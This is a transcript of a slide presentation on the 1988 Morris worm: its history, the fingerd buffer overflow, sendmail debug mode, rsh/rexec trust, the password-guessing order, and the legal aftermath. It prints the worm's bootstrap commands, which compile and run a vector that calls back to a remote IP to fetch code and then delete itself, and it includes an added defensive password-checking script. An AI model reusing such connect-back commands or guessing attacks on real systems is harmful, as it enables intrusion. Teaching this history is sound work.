MORRIS WORM

by Viktoria Shangina on 24 November 2015


Transcript of MORRIS WORM

How did it work?
The worm took advantage of vulnerabilities in Unix:
• sendmail program
• fingerd
• rsh/rexec
PROPAGATION VIA FINGER DAEMON VULNERABILITY:
• UNIX daemon which allows users to obtain information about other users over TCP/IP
• Buffer overflow vulnerability (gets()): buffer size 512 bytes, username request 536 bytes
• exec("/bin/sh",0,0)
History
On an evening in 1988, Robert T. Morris Jr., a graduate student at Cornell University, released the first computer worm.
Worm vs. Virus
WHAT IS A WORM?
• A self-replicating computer program
• It uses a network to send copies of itself to other nodes
• Runs without any user intervention
• Typically exploits security flaws in widely used services

In 1988 the Internet was used mostly by academics to share information: of the 60000 connected to the Internet, 10% were affected by the worm.
Beyond the damage caused by repeated infection, the worm didn't damage anything.
Morris Jr. was the first man judged under the Computer Fraud & Abuse Act (1986). He was sentenced to:
• three years of probation
• 400 hours of community service
• a fine of $10,050 plus the costs of his supervision
PASSWORD VULNERABILITY: /etc/passwd
The worm used a password guessing and dictionary attack mechanism.
The password guessing mechanism of the Morris worm was the following:
1) NULL password
2) Username as the password
3) Username followed by itself: jsmithjsmith
4) Backward username: htimsj
5) GECOS data from the pw file
6) Special dictionary of known passwords, containing 432 words
7) Extreme attack: /usr/dict/words
[Diagram labels: password guessing; dictionary attack; ~ 4 weeks]
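The guess classes listed above double as a password-policy checklist. The following added example (not part of the original presentation) names the class, 1 to 6, that a proposed password falls into so it can be rejected when it is set; the sample passwd line, the three-word dictionary and the reading of "GECOS data" as the words of the full-name field are assumptions.

```python
import re

# Constructed sample input: one /etc/passwd line and a tiny stand-in word set
# (assumption: NOT the worm's 432-word list, which the page does not reproduce).
SAMPLE_LINE = "jsmith:x:1001:1001:John Smith,Room 12,555-0100:/home/jsmith:/bin/sh"
SAMPLE_DICTIONARY = frozenset({"aaa", "academia", "wizard"})


def parse_passwd_line(line):
    """Return (username, gecos) from one colon-separated passwd line."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError("malformed passwd line: %r" % line)
    return fields[0], fields[4]


def gecos_tokens(gecos):
    """Lower-cased words of the full-name subfield (text before the first comma).

    Assumption: the page only says "GECOS data", so name words are used here.
    """
    full_name = gecos.split(",")[0]
    return {t.lower() for t in re.split(r"[^A-Za-z0-9]+", full_name) if t}


def weak_class(passwd_line, candidate, dictionary=SAMPLE_DICTIONARY):
    """Name the first guess class (1-6 above) that candidate matches, else None."""
    user, gecos = parse_passwd_line(passwd_line)
    checks = [
        ("null password", candidate == ""),
        ("username", candidate == user),
        ("username doubled", candidate == user + user),
        ("username reversed", candidate == user[::-1]),
        ("GECOS data", candidate.lower() in gecos_tokens(gecos)),
        ("dictionary word", candidate.lower() in dictionary),
    ]
    for name, matched in checks:
        if matched:
            return name
    return None


def audit(passwd_line, candidates, dictionary=SAMPLE_DICTIONARY):
    """Map each proposed password to its weak class; strong ones map to None."""
    return {c: weak_class(passwd_line, c, dictionary) for c in candidates}
```

Passing a larger word set as `dictionary`, for example one loaded from the system word list, extends the same check to class 7.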
SENDMAIL
Mailer program to route mail in a heterogeneous network.
• With the debug option, a tester can run programs to display the state of the mail system without sending mail or establishing a separate login connection
• This resulted in the worm being connected to a remote shell via the TCP connection.
RSH/REXEC
rsh and rexec are network services which offer remote command interpreters.

rsh: /etc/hosts.equiv; .rhosts (per user)
• Client IP, user ID
• Relies on a "privileged" originating port and permission files

rexec:
• User ID, password
• Uses password authentication
Worm priority
1) passwordless rsh
2) finger daemon
3) sendmail
4) rexec and password rsh
[Diagram: finger client and server sockets; the server reads the request with gets(); buffer size 512 bytes; normal request ("finger zulfiqar e example") < 512 bytes; worm request 536 bytes]
cc -o x14481910 x14481910.c;
./x14481910 128.32.134.16 32341 8712440
rm -f x14481910 x14481910.c;
echo DONE

[Diagram labels: executable code; 1 of 7 times self destruction skipped; self destruction; uses password attack; trust; rsh = remote shell; worm, command; as full search ~ 4 weeks]

Main program
• Collects information on other machines in the network
• Reading public configuration files
• Running system utility programs

Vector program
• This vector program was 99 lines of C code that would be compiled and run on the remote machine.
• Connects back to the infecting machine, transfers the main worm binary
• Deleted automatically
Plan
• What is a worm?
• Who created the worm, when and why?
• Worm features
• Worm work steps
• Q&A
High level description
Aftermath

[Timeline, 1988 to 2015: first worm; Internet fraud; Cyberterrorism; Cyberextortion; Cyberwarfare; torrents, Deep Web ...]
Cyber attacks affect real life (broker stocks):
"Hacked AP Twitter feed reporting fake White House attack rocks markets" (2013)
https://play.kahoot.it/#/k/0348761e-985e-47e5-95d2-531a6da841b4